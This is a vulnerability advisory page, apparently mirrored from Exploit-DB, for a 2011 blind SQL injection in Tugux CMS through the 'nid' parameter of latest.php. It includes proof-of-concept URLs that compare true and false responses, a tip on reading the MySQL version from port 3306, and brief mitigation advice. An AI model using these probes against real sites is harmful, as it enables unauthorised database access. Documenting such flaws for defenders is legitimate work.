Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Tugux CMS (nid) BLIND sql injection vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Tugux CMS
by:
eidelweiss
7.5
CVSS
HIGH
BLind SQL Injection
89
CWE
Product Name: Tugux CMS
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2011

Tugux CMS (nid) BLIND sql injection vulnerability

The Tugux CMS is vulnerable to blind SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL queries through the 'nid' parameter in the 'latest.php' page. The vulnerability can be confirmed by using the provided proof of concept (p0c) examples. Additionally, the vulnerability can also be used to obtain the MySQL version running on the server by accessing the server on port 3306.

Mitigation:

The vendor has not provided a patch for this vulnerability. However, to mitigate the risk, users are advised to restrict access to the 'latest.php' page and ensure that user input is properly validated and sanitized.
Source

Exploit-DB raw data:

===================================================================
    Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
 
Software:   Tugux CMS
Vendor:     www.tugux.com
Vuln Type:  BLind SQL Injection
Download link:  http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
 
 
References: http://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html
 
 
===================================================================
 
    exploit & p0c
 
[!] latest.php?nid=[valid nid]
 
    Example p0c
 
[!] http://server/latest.php?nid=9    <= True
[!] http://server/latest.php?nid=-9   <= False
 
[+] http://server:3306    <= download the file , save and open with c++ or wordpad will show mysql version
 
[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D
 
 
====================================================================
 
    Nothing Impossible In This World Even Nobody`s Perfect
 
===================================================================
 
==========================| -=[ E0F ]=- |==========================